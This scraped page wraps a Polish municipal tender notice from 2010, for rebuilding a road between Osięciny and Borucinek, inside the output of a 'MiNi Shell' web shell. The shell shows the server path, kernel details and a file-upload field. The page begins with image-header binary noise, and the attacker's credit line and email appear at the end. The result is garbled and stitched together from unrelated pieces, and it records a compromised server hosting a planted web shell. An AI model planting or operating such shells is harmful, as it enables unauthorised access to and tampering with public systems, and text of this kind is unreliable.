JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100127/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100127/24012-N-2010.html

<p class="kh_header"><b>Osięciny: Przebudowa drogi gminnej nr 180228 C Osięciny-Borucin  w km 0+000 do 2+630,50 w  m. Osięciny, Borucinek.</b><br>
<b>Numer ogłoszenia: 24012 - 2010; data zamieszczenia: 27.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Osięciny , ul. I Armii Wojska Polskiego 14, 88-220 Osięciny, woj. kujawsko-pomorskie, tel. 054 2650030, 2650034, faks 054 2650185.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.ug-osieciny.samorzady.pl//; www.osieciny.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa drogi gminnej nr 180228 C Osięciny-Borucin  w km 0+000 do 2+630,50 w  m. Osięciny, Borucinek..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest wykonanie zadania pod nazwą: Przebudowa drogi gminnej nr 180228 C Osięciny-Borucin  w km 0+000 do 2+630,50 w  m. Osięciny, Borucinek.
2.Przebudowa powyższej drogi obejmuje następujące elementy robót:
- roboty pomiarowe
- roboty przygotowawcze
- roboty ziemne
- podbudowa
- roboty nawierzchniowe
- wjazdy
3. Na budowanym odcinku znajduje się następująca infrastruktura techniczna:
- napowietrzna linia energetyczna 
- podziemna linia wodociągowa
- podziemna linia telekomunikacyjna
- odcinki kanalizacji sanitarnej
Wszystkie wyżej wymienione urządzenia pozostaną nienaruszone. 

4. Projekt budowlany obejmuje przebudowę jezdni, chodnika, wjazdów do posesji.
Początek projektowanego odcinka drogi (km 0+000) stanowi krawędź jezdni o nawierzchni bitumicznej drogi wojewódzkiej nr 267 Ujma Duża - Piotrków Kujawski.
Koniec projektowanego odcinka drogi (km 2+630,5), granica pasa drogi gminnej z drogą krajową  nr 62 Strzelno-Anusin.
Planowana przebudowa ma na celu rozszerzenie istniejącej funkcji ulicy, poprawę obsługi mieszkańców oraz lepsze połączenie z siecią dróg.
5. Parametry projektowe drogi gminnej nr 180228 C Osięciny-Borucin: 
- Klasa ulicy: L - lokalna                
- Przekrój poprzeczny: 1 x 2 pasy ruchu
- Szerokość jezdni: 2x2,75 = 5,5 m, 2x2,5 = 5,0 m i ciąg pieszy 1x1,2-1,5 m 
- Krawężnik uliczny 15x30 cm na ławie betonowej z oporem
- Krawężnik najazdowy 15x22 cm na ławie betonowej z oporem
- Kategoria ruchu - KR1 
6. Projektowane elementy polegać będą na budowie jezdni, chodników zgodnie z danymi, które mieszczą się w istniejącym pasie drogowym w liniach rozgraniczających pas drogowy bez zmian wysokościowych według danych zawartych w opisie technicznym projektu budowlanego.
Projekt przewiduje przebudowę następujących elementów:
a) Jezdni- zakłada się wykonanie poszerzenia jezdni drogi nr 180228 C  na odcinku 400 mb na podsypce piaskowej jako warstwę odsączającą oraz podbudowę  z kruszywa łamanego i dwuwarstwową nawierzchnię bitumiczną na projektowanym odcinku.
b) Odwodnienie- przewiduje się odwodnienie powierzchniowe, które zostanie sprowadzone  poprzez budowę kolektora deszczowego (odrębna dokumentacja) na odcinku 350 mb. Na pozostałym odcinku drogi odprowadzenie wód opadowych nastąpi  dzięki spadkom poprzecznym jezdni i regulacji poboczy gruntowych do istniejących rowów przydrożnych.
c) Chodniki- projektuje się poszerzenie chodnika z kostki betonowej  grubości 6 cm
na podsypce cementowo-piaskowej obramowane opornikiem betonowym   na podsypce  cementowo-piaskowej (zagęszczonej) gr. 10 cm.
d) Zjazdy do posesji- zjazdy przyjęto z kostki betonowej grubości 8 cm, kolorowej  na podsypce cementowo-piaskowej grub. 3 do 5 cm, podbudowie z betonu C8/10 grub.15 cm.
e) Skrzyżowania z ulicami-skrzyżowania przyjęto jako zwykłe wykonane  na podbudowie  z kruszywa łamanego i nawierzchni bitumicznej.
Jako ograniczenie nawierzchni jezdni zastosowano krawężnik betonowy uliczny  15 x 30 cm wykonany jako wystający zgodnie z oznaczeniami w części rysunkowej dokumentacji.
Jako rozgraniczenie pomiędzy nawierzchnią jezdni a zjazdów zastosowano krawężnik betonowy zjazdowy 15 x 22 cm.
Jako ograniczenie nawierzchni zjazdów do posesji oraz chodników zastosowano  obrzeże betonowe 8 x 30 cm.
Spoiny pomiędzy elementami krawężnika, obrzeża oraz elementami kostki brukowej  w nawierzchni zjazdów do posesji oraz chodników należy wypełnić piaskiem.
Kolor kostki brukowej szarocementowy, typ dowolny; w nawierzchni  zjazdów do posesji - kolorowy.
Pomiędzy warstwami asfaltowymi oraz między warstwami podbudowy, a warstwą asfaltową należy stosować wiązanie międzywarstwowe uzyskane przez skropienie  lepiszczem asfaltowym podłoża pod wykonywaną warstwę. Rodzaj lepiszcza  wg PN- S 96025  Nawierzchnie asfaltowe.
Szczegóły konstrukcji nawierzchni, stosowania ław przy krawężnikach i obrzeżach, konstrukcji zjazdów i elementów kanalizacji deszczowej - wg części rysunkowej dokumentacji.
f) Roboty ziemne- zakłada się wykonanie robót ziemnych związanych  z korytowaniem pod projektowane nawierzchnie mechanicznie oraz ręcznie. Po wykonaniu robót ziemnych -przy użyciu sprzętu mechanicznego (w części ręcznej) i splantowaniu podłoża należy przystąpić do jego zagęszczenia.
g) Roboty uzupełniające- w ramach robót uzupełniających zostaną uformowane, zagęszczone  i wyprofilowane z nadaniem normatywnego spadku 6% obustronne  pobocza gruntowe.
Uzupełnienie brakującego oznakowania pionowego- A-7  szt.1, A-2 szt.3, A-1 szt.3, D-42 szt.1, D-43 szt.1, E-17a (Osięciny) szt.1, Borucinek szt.1, E-18a (Osięciny) szt.1,  (Borucinek) szt.1, T-1 (150m) szt.1, U-18a szt.1.
Częściowe uzupełnienie oznakowania poziomego w obrębie miejsc niebezpiecznych.
W rejonie czynnych sieci uzbrojenia podziemnego obowiązuje bezwzględny zakaz używania sprzętu mechanicznego. Roboty należy prowadzić z należytą ostrożnością szczególnie; przestrzegać zaleceń służb odpowiedzialnych za poszczególne media, roboty prowadzić pod ich nadzorem (wodociągi, przyłącza elektroenergetyczne, telekomunikacyjne i gazowe)                          
7.  Szczegółowy opis przedmiotu zamówienia zawiera:                                                                       
a) dokumentacja projektowa                                                                                                 b) przedmiar robót							
c) specyfikacja techniczna wykonania i odbioru robót
8.Okres gwarancji wymagany przez Zamawiającego - 36 miesięcy.                                             
9. Zaleca się wizytację przyszłego placu budowy.
10. Kod CPV 45233000-9 - roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg.
11. Przedmiot zamówienia opisany został za pomocą dokumentacji projektowej oraz  specyfikacji technicznej wykonania i odbioru robót załączonych do specyfikacji istotnych warunków zamówienia i stanowiących jej integralną część. 
12. Zamówienie poniżej 4.845.000 euro.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.30.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. W niniejszym postępowaniu Zamawiający wymaga  wniesienia wadium w wysokości   25.650,00 zł  
  (słownie: Dwadzieścia pięć tysięcy sześćset pięćdziesiąt złotych 00 100)

2. Wadium może być wnoszone w jednej lub kilku następujących formach:
a) pieniądzu;
b)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-  kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c) gwarancjach bankowych;
d) gwarancjach ubezpieczeniowych;
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy  z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm)

3. Wadium w formie pieniężnej należy wnieść przelewem na rachunek bankowy  Urzędu Gminy Osięciny  KDBS O/Osięciny 72 9550 0003 2002 0000 0101 0002 
z dopiskiem na blankiecie przelewu wadium na zabezpieczenie oferty przetargowej -Przebudowa drogi gminnej nr 180228 C Osięciny-Borucin.  Kopię dowodu przelewu potwierdzoną za zgodność z oryginałem należy dołączyć do oferty.
     
4. Wadium wnoszone w formie: poręczenia bankowego, gwarancji bankowej, gwarancji ubezpieczeniowej, poręczeniu pieniężnym SKOK lub poręczeniach udzielanych przez podmioty  o których mowa w art. 6b ust. 5 pkt  ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przed­siębiorczości, należy w formie  nienaruszonego oryginału zdeponować w kasie u Zamawiającego, a kopię potwierdzoną za zgodność z oryginałem załączyć do oferty.

5. Wadium należy wnieść przed upływem terminu składania ofert. tj. do dnia          18 lutego 2010 r. do godz. 9:00.
6. Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie zostanie   zaliczone na rachunku bankowym Zamawiającego.
7. Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowaną formą wadium zostanie wykluczony z postępowania, a jego oferta zostanie odrzucona.
8. Zamawiający zwróci niezwłocznie wadium wszystkim Wykonawcom po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem  art. 46 ust. 4a ustawy.
9. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwróci niezwłocznie wadium po zawarciu umowy w sprawie zamówienia publicznego.
10. Zamawiający zwróci niezwłocznie wadium, na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
11. Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podst. art. 46 ust. 1 ustawy Pzp, jeżeli w wyniku ostatecznego rozstrzygnięcia protestu jego oferta została wybrana jako najkorzystniejsza. Wykonawca wniesie wadium w terminie określonym przez Zamawiającego.
12. Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:                                                                                                                              
a) odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie
b)   zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
13. Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej  za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
14. Zamawiający zatrzyma wadium wraz z odsetkami,  jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Pzp, lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nieleżących po jego stronie.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki  określone w art. 22 ust. 1 ustawy Pzp, t.j.: 
a) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek  ich posiadania;
b)  posiadają wiedzę i doświadczenie;
c) dysponują odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania   zamówienia; 
d) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie       zamówienia; 
2. Sposób dokonywania oceny spełniania warunków udziału w postępowaniu:
 a) Zamawiający uzna, że Wykonawca spełnia warunek posiadania uprawnień do wykonywania określonej działalności lub czynności oraz warunek znajdowania się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, oraz dysponowania potencjałem technicznym, jeżeli Wykonawca oświadczy, że spełnia warunki udziału w postępowaniu określone w pkt 4.1 siwz i art.22 ust.1 ustawy Pzp.
b) Zamawiający uzna, że Wykonawca spełnia warunek posiadania wiedzy i doświadczenia zapewniającego wykonanie zamówienia, jeżeli Wykonawca wykaże wykonanie w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy- w tym okresie, co najmniej dwóch zadań polegających na budowie, przebudowie, remoncie dróg, na łączną kwotę nie mniejszą niż 1.000.000,00 zł. brutto  lub jednego zadania, na kwotę nie mniejszą niż 500.000,00 zł. brutto.
c)  Zamawiający uzna, że Wykonawca spełnia warunek dysponowania osobami zdolnymi do wykonania zamówienia, jeżeli Wykonawca wykaże dysponowanie kierownikiem budowy, posiadającym uprawnienia do kierowania robotami w specjalności drogowej oraz przynależność do stosownej izby samorządu zawodowego.
Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.

Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału         w postępowaniu na podstawie załączonych dokumentów i oświadczeń, zgodnie z formułą spełnia-nie spełnia. Z treści załączonych do oferty dokumentów musi wynikać jednoznacznie, że wyżej wymienione warunki Wykonawca spełnił..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Celem potwierdzenia spełniania warunków udziału w postępowaniu, Wykonawcy złożą niżej wymienione dokumenty.
   1. Celem potwierdzenia spełniania wszystkich warunków udziału w postępowaniu  Wykonawca złoży oświadczenie o spełnianiu tych warunków o treści odpowiadającej treści art. 22 ust. 1 ustawy - Prawo Zamówień Publicznych wg załącznika nr 2 do siwz.
   2. Celem wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia, Wykonawca załączy do oferty:
a)  oświadczenie o braku podstaw do wykluczenia wg załącznika nr 3 do siwz
b) aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do   rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy Pzp, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt 2 ustawy  
c) aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu- wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert
d) aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenia, że uzyskał  przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu- wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert
e) aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
f) aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
3. Celem potwierdzenia spełniania warunku posiadania wiedzy i doświadczenia, opisanego w pkt 4, ppkt 4.2. lit. b)  siwz, Wykonawca załączy do oferty:
a) wykaz robót budowlanych, zgodnie z wymaganiami określonymi w pkt 4, ppkt 4.2.  lit. b) siwz, z podaniem ich rodzaju i wartości, daty i miejsca wykonania wg załącznika nr 5 do siwz
b) dokumenty potwierdzające, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
   4. Celem potwierdzenia spełniania warunku dysponowania potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, opisanego w pkt 4, ppkt 4.2. lit.c) siwz, Wykonawca załączy do oferty
a) wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, z podaniem  informacji na temat kwalifikacji zawodowych, doświadczenia i wykształcenia, a także zakresu wykonywanych czynności oraz informacją o podstawie do dysponowania tymi osobami wg załącznika nr 6 do siwz
b) dokumenty potwierdzające, że ujęte wyżej wymienionym wykazie osoby posiadają: 
- uprawnienia do kierowania robotami  w specjalności drogowej
- aktualny wpis we właściwej izbie samorządu zawodowego
c) jeżeli Wykonawca wykazał, że będzie dysponował osobami innych podmiotów, do oferty należy załączyć dokument potwierdzający, że Wykonawca będzie dysponował tymi osobami, w szczególności przedstawić pisemne zobowiązanie innych podmiotów do oddania mu do dyspozycji tych osób na okres korzystania z nich przy wykonywaniu zamówienia  
         5. Jeżeli Wykonawca wykazując spełnianie warunków, o których mowa w art. 22 ust.1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Pzp, a podmioty te będą brały udział w realizacji części zamówienia, Wykonawca załączy do oferty dokumenty, o których mowa w pkt 5.2 siwz dotyczące tych podmiotów..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http: bip.ug-osieciny.samorzady.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Osięcinach, ul. 1 Armii Wojska Polskiego 14, 88-220 Osięciny, pokój nr 5.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.02.2010 godzina 10:00, miejsce: Urząd Gminy w Osięcinach, ul. 1 Armii Wojska Polskiego 14,sekretariat- pokój nr 19, II piętro..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com